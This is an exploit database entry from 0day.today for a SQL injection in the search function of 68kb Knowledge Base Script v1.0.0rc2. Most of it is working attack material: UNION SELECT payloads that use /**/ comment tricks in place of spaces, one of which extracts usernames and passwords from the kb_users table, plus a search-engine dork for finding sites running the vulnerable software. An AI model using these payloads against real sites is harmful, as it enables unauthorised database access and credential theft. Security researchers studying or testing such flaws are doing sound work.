68kb Knowledge Base Script v1.0.0rc2 Search SQL Injection

2010-03-28T00:00:00
ID 1337DAY-ID-11491
Type zdt
Reporter Jelmer de Hen
Modified 2010-03-28T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =========================================================
68kb Knowledge Base Script v1.0.0rc2 Search SQL Injection
=========================================================

Exploit Title: 68kb SQLI
Date: 2010-03-28
Author: Jelmer de Hen
Software Link: http://68kb.googlecode.com/files/68kb-v1.0.0rc2.zip
Version: v1.0.0rc2
 
Go to /search
and search for: %')/**/UNION/**/ALL/**/SELECT/**/1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15#
Don't use spaces in the injection because they change the sql query in a way which makes the injection nearly impossible; instead use /**/.
Here is an example how to select usernames and password if the default prefix of kb_ is used during the installation:
search for: %')/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/kb_users#
 
Dork: "Powered by 68kb"
 
-Jelmer de Hen



#  0day.today [2018-04-15]  #